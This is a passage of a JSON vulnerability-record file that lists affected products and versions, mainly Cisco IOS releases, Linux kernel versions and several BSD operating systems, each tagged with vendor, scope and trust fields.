        "version": "11.2\\(16\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(7\\)t"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.20.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.3.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.19.1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(14\\)sz2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.1\\(36\\)ca4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.19.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.15.7"
      },
      {
        "model": "bsd os",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "bsdi",
        "version": "4.2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(14\\)t5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.0.15"
      },
      {
        "model": "openbsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openbsd",
        "version": "4.0"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(1\\)xa3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(30\\)s1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.4\\(6\\)t1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.8.1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(19\\)sl"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(22\\)sy"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(5b\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.2\\(8.2\\)sa6"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0sv"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(22\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.3\\(1\\)t"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(21\\)sl"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": "3.1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1yb"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(4\\)bc1a"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(18\\)sxe1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(10\\)s7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.11.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.33.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.22.3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(5\\)yf"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(8\\)ea1b"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.34"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2zj"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.41"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(14\\)t2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.3.14"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(14\\)yq1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(27b\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(25\\)sed"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.11.9"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2xh"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.13.5"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0sl"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(2\\)xb15"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(9a\\)bc7"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(9\\)ex"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.1.89"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(13\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.2\\(10\\)bc"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0wx"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3yc"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.3.26"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(13a\\)bc1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(10\\)e4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.20.15"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(15\\)t16"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2so"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.2\\(23a\\)bc1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1xe"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2su"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.58"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1xg"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.10"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(26\\)s"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.3\\(11\\)b"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2zl"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(8\\)ja"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(20\\)w5\\(22b\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(20\\)e2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2n"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.11.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.33.4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(15\\)mc2c"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.17.8"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2zh"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(12c\\)e7"
      },
      {
        "model": "bsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "bsd",
        "version": "4.3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(14\\)s14"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(3d\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(7\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(18\\)s6"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(2\\)xj1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3yi"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": "4.6.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.17.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(30\\)s4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.67"
      },
      {
        "model": "netbsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netbsd",
        "version": "1.2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(18\\)ew2"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": "3.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.33"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(2\\)xc1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(21\\)s4a"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(28c\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(6\\)ea2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(4\\)xe4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(3.4\\)t"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(22\\)s4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2mb"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(11\\)t5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.11.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.2.10"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(2\\)ja5"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(25\\)w5-27d"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(2\\)xu"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3xl"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.4xt"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(2\\)xt3"
      },
      {
        "model": "netbsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netbsd",
        "version": "1.3.3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.4\\(9\\)t"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(5\\)xs2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3xm"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3xv"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(7\\)xf1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(11\\)ea1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.44"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": "2.2.4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(24\\)sv1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(4\\)t1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(7\\)xi7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.0.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2cx"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(1\\)db2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(7\\)t4"
      },
      {
        "model": "dragonflybsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dragonflybsd",
        "version": "1.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.21"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1xt"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": "1.5"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0xb"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(4\\)dc2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.54"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.1\\(15\\)ia"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.2\\(19\\)gs0.2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3ys"
      },
      {
        "model": "netbsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netbsd",
        "version": "1.3.1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(5a\\)b5"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2ez"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3xk"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(7\\)t8"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.4xe"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.0\\(x\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2se"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(7\\)t10"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(10\\)w5\\(18f\\)"
      },
      {
        "model": "netbsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netbsd",
        "version": "2.0.3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(15\\)ys"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(7\\)t2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(5\\)t2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1yf"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(10g\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(13\\)ea1c"
      },
      {
        "model": "openbsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openbsd",
        "version": "2.8"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(7\\)ec"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(11\\)yw"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": "4.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.15.5"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.2\\(26a\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0xr"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(12c\\)ev01"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(12.05\\)"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(1\\)xe"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(8b\\)e9"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(8\\)t7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.52"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.69"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.11.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.12"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.3\\(11b\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(5\\)yd2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.34"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(2\\)by"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": "2.2.7"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(11\\)t3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2fy"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(6.5\\)ec3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(5\\)xv"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": "5.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.31"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(7\\)t3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(8\\)yy3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.21.1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(2\\)t3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(7c\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0db"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(20\\)s9"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": "2.1.6.1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.4\\(3\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2b"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.0"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(19\\)s"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.10"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(6b\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(5\\)yb4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.50"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(23a\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2sxf"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2xq"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3ja"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(26\\)sv"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.20.4"
      },
      {
        "model": "netbsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netbsd",
        "version": "1.5.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.32"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0xm"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(20\\)s2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.1\\(36\\)cc2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.0.11"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(15\\)jk4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1x\\(l\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(17\\)st8"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(4\\)eo1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2sxb"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(28\\)w5-30b"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.2.20"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(5.2\\)xu"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(24\\)sv"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(18\\)sv3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(18\\)s10"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(25\\)ez"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.3.47"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(17\\)sl2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
